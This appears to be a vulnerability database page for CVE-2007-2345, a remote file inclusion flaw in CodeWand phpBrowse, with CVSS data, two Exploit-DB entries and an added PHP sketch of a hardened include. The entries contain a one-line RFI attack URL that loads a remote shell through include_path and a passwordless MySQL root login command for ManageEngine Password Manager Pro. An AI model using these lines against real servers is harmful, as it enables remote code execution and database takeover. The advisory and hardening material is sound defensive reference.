CVE-2007-2345
Published 2007-04-27
Priority: P3 47, high, 7.5 CVSS 2.0
AV:N/AC:L/Au:N/C:P/I:P/A:P
EXPLOIT
EPSS: 6.08% (92.5th percentile)
PHP remote file inclusion vulnerability in include/include_stream.inc.php in CodeWand phpBrowse allows remote attackers to execute arbitrary PHP code via a URL in the include_path parameter.
No detection rules found.
Exploit-DB
ManageEngine Password Manager Pro Build 5401 - Database Remote Unauthorized Access
exploitdb·2007-04-27
CVE-2007-2429 ManageEngine Password Manager Pro Build 5401 - Database Remote Unauthorized Access
---
source: https://www.securityfocus.com/bid/23693/info
ManageEngine Password Manager Pro is prone to a remote unauthorized-access vulnerability due to a design error.
An attacker may leverage this issue to gain unauthorized access to the application's database with administrative privileges. Successful exploits will result in a complete compromise of vulnerable applications and may aid in further attacks.
ManageEngine Password Manager Pro Free edition is vulnerable; other versions may also be affected.
$ mysql -h example.com --port 2345 -u root
Exploit-DB
CodeWand phpBrowse - 'site_path' Remote File Inclusion
exploitdb·2007-04-05
CVE-2007-2345 CodeWand phpBrowse - 'site_path' Remote File Inclusion
---
PhpBrowse
Found by kezzap66345 *
Script:
http://www.codewand.org/download/phpBrowse.tar.gz
ERROR:
/include/include_stream.inc.php
include($include_path . "style.inc.php"); <<< rfi coded
RFI:
http://SITE.com/path/include/include_stream.inc.php?include_path=[SHELL]
kezzap66345[at]hotmail[dot]com
******thanx=x0r0n*str0ke*shika***Siircicocuk*******************************************
# milw0rm.com [2007-04-05]
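The flagged include line beside a hardened form, as an added example that is not phpBrowse code and not part of the advisory above. The constant name, the allowlist and the helper `resolve_fragment` are hypothetical, and the sketch assumes style.inc.php sits in the same directory as the script.

```php
<?php
// Added example, not phpBrowse code. Hardened counterpart to the flagged line
//   include($include_path . "style.inc.php");
// where $include_path is never set by the script itself, so with
// register_globals on it can be filled from ?include_path=... in the request.
// Defense in depth in php.ini: register_globals = Off, allow_url_include = Off.

declare(strict_types=1);

// Base directory fixed by the code (assumption: fragments live beside this file).
const PHPBROWSE_INCLUDE_DIR = __DIR__ . DIRECTORY_SEPARATOR;

// Hypothetical allowlist of fragments this script is allowed to load.
const ALLOWED_FRAGMENTS = ['style.inc.php'];

/**
 * Resolve a fragment name to a local file inside the base directory.
 * Returns the absolute path, or null when the name is rejected.
 */
function resolve_fragment(string $name, string $baseDir = PHPBROWSE_INCLUDE_DIR): ?string
{
    if (!in_array($name, ALLOWED_FRAGMENTS, true)) {
        return null;                        // not on the allowlist
    }
    $base = realpath($baseDir);
    $path = realpath($baseDir . $name);     // false for missing files and URLs
    if ($base === false || $path === false) {
        return null;
    }
    // The resolved file must sit under the base directory; this rejects
    // ../ traversal and symlinks that point outside it.
    if (strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $path;
}

// No request data reaches the include: the name is a literal in the code.
$fragment = resolve_fragment('style.inc.php');
if ($fragment === null) {
    http_response_code(500);
    exit('include failed');
}
include $fragment;
```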
No writeups or analysis indexed.